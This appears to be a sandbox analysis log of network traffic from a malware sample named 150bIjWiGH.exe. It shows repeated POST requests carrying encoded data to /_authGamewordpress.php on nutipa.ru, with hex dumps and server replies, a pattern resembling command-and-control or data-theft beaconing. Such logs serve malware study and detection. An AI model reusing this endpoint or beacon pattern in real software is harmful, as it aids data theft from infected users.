                                                            Data Ascii: P_C]_VXT]ZVQPYW[UQ^CZU[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?[-)?Y"?"?>3#/3&9'>9W*3:_<=U;.F'#P #
                                                            Dec 15, 2024 19:36:31.278477907 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:31.543986082 CET796INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Zz%2FytVKo%2F4UBNcjfmQImaUqCXA0Zeom9Sf%2F3DzYl0h3Tf92fPzPQAg7LxFEBU4sFxQYk395Ah8HrnitY9acBVylawxITYGIgofjBi3hx41Ex4%2Fzd3KXzGMuCbE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a268d5643a4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3889&min_rtt=1776&rtt_var=4893&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=78137&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.449747104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:31.790682077 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.449749104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:32.134924889 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:32.482455969 CET1420OUTData Raw: 50 50 46 5f 5a 5d 5d 51 5d 5a 56 51 50 5c 57 50 55 55 5e 45 5a 50 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PPF_Z]]Q]ZVQP\WPUU^EZP[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^)-!=#\!:E<='X#,8\19'>")'$=6<#!T/.F'#P 7
                                                            Dec 15, 2024 19:36:33.222235918 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:33.534456015 CET941INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rS27k3d%2Bj3XYzR%2FuCUjzyH8vB7NhaQmE4VAOpIHqmQPt3qlFedOIhNdqNaE0Dz0JqebsZSJ9wc%2BRS%2FO2hmyXejpYIhjGucAmEvCels0sYHetXnE5Co54bONoJ0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a32aec83354-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3342&min_rtt=2027&rtt_var=3392&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=116297&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 03 35 14 21 0a 23 2d 20 50 2d 02 21 53 2b 20 05 1b 30 32 29 59 24 01 37 59 3d 04 3c 0d 24 29 07 5b 37 0c 25 57 3f 37 32 05 26 1c 21 51 03 11 21 00 26 2d 38 12 2b 3a 28 17 25 0f 0d 16 26 3e 20 14 3c 01 39 0f 30 5e 2b 53 34 3e 2c 1a 2e 29 3f 05 28 14 01 5d 39 00 36 54 34 0c 2e 53 0c 17 25 5d 28 07 0f 03 23 54 36 09 27 02 28 0e 20 17 32 54 2a 20 3c 50 24 23 0a 0a 26 2e 38 1b 36 09 29 57 24 3a 29 02 34 22 3e 55 2a 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a
                                                            Data Ascii: 98:5!#- P-!S+ 02)Y$7Y=<$)[7%W?72&!Q!&-8+:(%&> <90^+S4>,.)?(]96T4.S%](#T6'( 2T* <P$#&.86)W$:)4">U*"%\ .R4]T
                                                            Dec 15, 2024 19:36:33.726315022 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.449750104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:32.304044962 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:32.654339075 CET2536OUTData Raw: 55 57 43 58 5f 58 5d 52 5d 5a 56 51 50 5b 57 5b 55 50 5e 42 5a 52 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWCX_X]R]ZVQP[W[UP^BZR[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_([>^>*Y5?6C(=7?'--1>%T*#^']=#5T,.F'#P +
                                                            Dec 15, 2024 19:36:33.391849041 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:33.632921934 CET793INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9GEBQc5dAl0W6h2ISauYwtbbPJWyeSrZoGobzY6MkQeH4vaSVQ%2F4DeuUL%2FxcTsIu5FYEjUKUqvmXJEVd3lZ1ZZqiVwuPRwlfeiabrH5tGFUtFgEdAu5iZ0xDaw%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a33bb574231-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7098&min_rtt=1627&rtt_var=11552&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=32160&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.449752104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:33.890738010 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.449753104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:34.141935110 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:34.498130083 CET2536OUTData Raw: 50 5e 43 5e 5a 5b 5d 54 5d 5a 56 51 50 59 57 52 55 52 5e 46 5a 54 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P^C^Z[]T]ZVQPYWRUR^FZT[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+->X)76=+='\#?(X1-1U>0'.?-+.F'#P #
                                                            Dec 15, 2024 19:36:35.236308098 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:35.782630920 CET801INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDgE7658LVhF4cPAEE%2Bi0yQHtJwtek1QltKoB2WAqNpLzW%2F%2FsyYt7%2BRxYqROcq5eMgPSJfBNbtVQk1%2Fpei0UppOHczF6VkNocz9k1OC5aNBQTb6Po00W7pmxsUI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a3f4ae97281-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7511&min_rtt=2099&rtt_var=11612&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=32158&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.449754104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:36.020024061 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:36.372960091 CET2536OUTData Raw: 50 5f 43 58 5a 58 5d 52 5d 5a 56 51 50 5c 57 54 55 57 5e 41 5a 55 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P_CXZX]R]ZVQP\WTUW^AZU[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_+[2^=9'5Z&B+[+\#?3%=%.Q)0'.^( )W/;.F'#P 7
                                                            Dec 15, 2024 19:36:37.144916058 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:37.383358002 CET799INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V11o%2FaIA8wFOcdLkJzxhwIq34glNCyhwOBXYdQbbcpisNgE6qA%2FhrxkkN%2BstPo7qXu%2B4ITLMytptDpppLD%2F2arJ1FkPKM85MCP378gUm66I0RrHge2asZoEuMk8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a4b2a3af5f6-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7270&min_rtt=1805&rtt_var=11608&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=32066&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.449755104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:37.635854959 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:37.982553959 CET2536OUTData Raw: 50 51 43 51 5f 5f 5d 54 5d 5a 56 51 50 5e 57 5a 55 56 5e 40 5a 51 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQCQ__]T]ZVQP^WZUV^@ZQ[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]?=*:?6,-(+Z!/81=-1>39<39S/.F'#P ?
                                                            Dec 15, 2024 19:36:38.727225065 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:38.992369890 CET796INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPYRq7mFmOWMEQU5S%2BimWdmsqk%2FQWAguFykoPvG%2BBKxzc2DVohYcCLGbozg3xRZWhREtZBvoVdzHQisGWXLS2OV9hbhA75jDfVO8lyTgr72%2B7VPk35dGLoj1Uxs%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a551aa97c69-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4555&min_rtt=1923&rtt_var=5987&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=63516&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.449756104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:38.860690117 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:39.216974974 CET1420OUTData Raw: 55 55 43 59 5f 56 58 57 5d 5a 56 51 50 50 57 52 55 57 5e 46 5a 50 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCY_VXW]ZVQPPWRUW^FZP[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(-9*9+]#?>A+=/Z!?[%X1>U*0?^'.6]+9-+.F'#P
                                                            Dec 15, 2024 19:36:40.002067089 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:40.242865086 CET940INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R0336bVLjotJI%2BjnKqPqrDGG4YlfxSWydw5xu9fHBuOsIEd23dYjNFNzRfS4YrD7aXwlaPoeFQctBLEqOlfzO55RQC6MiRVVbfS4OggKgzyolimjds4MZcRZ0y0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a5cdcd89e08-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7541&min_rtt=2000&rtt_var=11832&sent=5&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=31512&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 5a 35 39 22 1f 23 00 0d 0d 2e 3c 32 0f 28 1e 38 40 24 22 2d 5e 33 5e 3f 15 3d 2d 3b 1c 25 39 36 06 22 31 31 1c 3f 27 25 12 26 0c 21 51 03 11 22 12 25 58 3c 5a 3e 00 2f 03 25 21 23 5e 31 3d 38 5f 2a 28 21 0c 27 01 23 54 23 10 3b 0f 2e 14 0a 5b 2b 03 30 02 2f 2e 00 13 37 0c 2e 53 0c 17 26 04 3f 07 3a 58 21 31 3a 0e 30 3c 1a 0e 21 29 3e 53 3f 33 2b 0e 24 23 23 1f 33 2e 24 1a 22 33 3d 53 26 03 3d 06 23 32 21 09 3d 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989Z59"#.<2(8@$"-^3^?=-;%96"11?'%&!Q"%X<Z>/%!#^1=8_*(!'#T#;.[+0/.7.S&?:X!1:0<!)>S?3+$##3.$"3=S&=#2!="%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.449757104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:39.250420094 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:39.607448101 CET2536OUTData Raw: 50 56 46 5c 5f 57 5d 56 5d 5a 56 51 50 51 57 57 55 5d 5e 42 5a 51 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVF\_W]V]ZVQPQWWU]^BZQ[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+:Y=*#"*?'X#Y<2._2")83(38.F'#P
                                                            Dec 15, 2024 19:36:40.352747917 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:40.602191925 CET792INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4oHDhqyl94b9UMup59x8n%2FHPVBWJfJpLK5ImsB56hBvPG9zp6hdjSIybfcL5KxtwcBAs0rO0aXvW5J0PcgoUOgU4NV9SLpPP7DARvqmXXX0dFNGo1MOpW%2F3CGU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a5f4bebc47c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4196&min_rtt=1611&rtt_var=5774&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=65494&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.449758104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:40.891896009 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:41.247925043 CET2536OUTData Raw: 55 55 43 59 5a 5c 58 56 5d 5a 56 51 50 59 57 54 55 54 5e 48 5a 5f 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCYZ\XV]ZVQPYWTUT^HZ_[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+=9):Y6,9?[8!<([2>Y&X-=06^<U%U8.F'#P #
                                                            Dec 15, 2024 19:36:41.979324102 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:42.223402977 CET798INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1S6aVvjfXEfEv3WKxRcgi%2FFITreFKHJpzke56na3bKYrE%2FYll1CUxSQZ58ySY3%2Ftr8GMLP%2F7vlgW%2BLdwGWwkK66pWA3c7NOgu9JHDQIPfalh8W0Tb8ZLPuTYUk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a696c62425b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4063&min_rtt=1650&rtt_var=5445&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=69663&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.449759104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:42.481076002 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
